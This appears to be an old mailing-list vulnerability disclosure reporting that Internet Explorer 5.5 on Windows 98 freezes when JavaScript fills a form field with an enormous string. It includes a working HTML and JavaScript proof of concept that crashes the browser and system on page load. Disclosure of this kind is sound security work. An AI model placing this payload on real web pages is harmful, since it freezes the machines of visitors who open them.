I was testing in a lame way if an IIS apps could be attacked by sending
long POST and I realized IE is sensible to huge ammount of data in
<INPUT... > and <TEXTAREA> fields (maybe also others like SELECT).
Since nobody is willing to download a 10Mb page I just thought I could
fill VALUE="" attribute with JavaScript.
-- begin test.html --
<html><title></title>
<body>
<script language="JavaScript" src="t.js"></script>
<FORM NAME="IEDos" METHOD="POST" ACTION="./">
<IMG SRC="1.gif" width='10' height='10' border='0'
onLoad="FillTA(TA)">
<input type="text" name="TA" value="">
</FORM>
</body>
</html>
-- end test.html --
-- begin t.js --
<!--
function FillTA(obj) {
v="a";
for(i=0;i<100000000;i++) {
v=v+v;
};
obj.value=v;
return;
}
//-->
-- begin t.js --
IE freezes and if you've few secs of patience the system freezes too.
IE 5.5 on W98 (I hope fully patched).
commenting obj.value=v IE survives.
I've observed some protection errors too but occasional.
I hope this is not an old news.
--
Ivan Sergio Borgonovo
Webmaster Gorilla.it http://www.gorilla.it
Tel. +39 02 26149225/26149008 Fax. +39 02 26149657
Via d'Apulia 11, 20125 Milano, Italy
